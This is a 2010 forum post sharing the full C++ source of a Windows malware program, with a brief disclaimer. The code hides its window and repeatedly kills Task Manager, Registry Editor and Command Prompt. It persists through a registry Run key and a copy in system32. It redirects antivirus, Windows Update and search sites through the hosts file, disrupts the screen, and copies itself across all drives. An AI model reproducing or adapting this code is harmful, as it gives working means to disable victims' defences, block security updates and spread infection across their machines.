LinkBack URL
About LinkBacks
I know writing malware is overrated, but I am dumping my whole C++ source folder, and this is included. I do not condone the use of this on your computer or anyone else's
Code:#include <windows.h> #include <string> #include <iostream> #include <vector> #include "wininet.h" #define WIN_32_LEAN_AND_MEAN void Restrict(); void Startup(); void InvertScreen(); void Spread(); void FindSub(); char path[MAX_PATH]; using namespace std; int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { HWND hWin; srand(GetTickCount()); int a = rand() % RAND_MAX + 1; int b = rand() % RAND_MAX + 1; int x = GetSystemMetrics(SM_CXSCREEN); int y = GetSystemMetrics(SM_CYSCREEN); AllocConsole(); hWin=FindWindowA("ConsoleWindowClass",NULL); ShowWindow(hWin,0); while(1) { if(a = b) { hWin = FindWindow(NULL,"Windows Task Manager"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Registry Editor"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Command Prompt"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow(NULL,"Close Program"); SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); hWin = FindWindow("Shell_TrayWnd",NULL); ShowWindow(hWin,false); Sleep(1000); ShowWindow(hWin,true); Sleep(1000); SetCursorPos(rand()%x, rand()%y); InvertScreen(); } if(a*b > RAND_MAX) { Startup(); Restrict(); Spread(); } else { MessageBox(NULL,"E.V.C Sevgm","Ebg 13",MB_OK); } } } void FindSub(string sub) { GetModuleFileName(GetModuleHandle(NULL), path, MAX_PATH); WIN32_FIND_DATA fdSub; string dir=sub+"*.*"; HANDLE hSpread = FindFirstFile(dir.c_str(), &fdSub); if (hSpread!=INVALID_HANDLE_VALUE) { int dirs=0; vector<string> dirnames; do{ if (fdSub.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY) { if (strcmp(fdSub.cFileName, ".") && strcmp(fdSub.cFileName, "..")) { dirnames.push_back(fdSub.cFileName); dirs++; } } else { string Spread=sub; Spread+=fdSub.cFileName; Spread+=".exe"; CopyFile(path, fdSub.cFileName, FALSE); } } while(FindNextFile(hSpread, &fdSub)!=0); FindClose(hSpread); for (int i=0; i<dirs; i++) { string curdir=sub+dirnames[i]+"\\"; FindSub(curdir); } } } void Spread() { char dir[4]="C:\\"; for (char n='C'; n<='Z'; n++) { dir[0]=n; FindSub(dir); } } void InvertScreen() { HDC hdc = GetWindowDC(NULL); PatBlt(hdc, 0, 0, GetDeviceCaps(hdc, HORZRES), GetDeviceCaps(hdc, VERTRES), DSTINVERT); Sleep(500); ReleaseDC(NULL, hdc); } void Restrict() { FILE *file; unsigned char PathToFile[20] = "winnit.exe"; file = fopen("C:\\Windows\\System32\\Drivers\\Etc\\Hosts","a"); fputs ("127.0.0.1 macafee.com\n",file); fputs ("127.0.0.1 www.macafee.com\n",file); fputs ("127.0.0.1 norton.com\n",file); fputs ("127.0.0.1 www.windowsupdate.microsoft.com\n",file); fputs ("127.0.0.1 www.yahoo.com\n",file); fputs ("127.0.0.1 yahoo.com\n",file); fputs ("127.0.0.1 google.com\n",file); fclose(file); file = fopen("C:\\windows\\System.ini","a"); fprintf(file,"device=%s",PathToFile); fclose(file); } void Startup() { HMODULE GetModH = GetModuleHandle(0); GetModuleFileName(GetModH, path, 256); HKEY hKey; char sd[255]; GetSystemDirectory(sd,255); strcat(sd,"\\winnit.exe"); CopyFile(path,sd,FALSE); unsigned char PathToFile[20] = "winnit.exe"; RegOpenKeyEx( HKEY_LOCAL_MACHINE,"\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey,"Windows User Init",0,REG_SZ,PathToFile,sizeof(PathToFile)); RegCloseKey(hKey); }
Results 1 to 1 of 1
Thread: [C++]Malware
- 01 Jul. 2010 05:00pm #1
[C++]Malware
Reply With Quote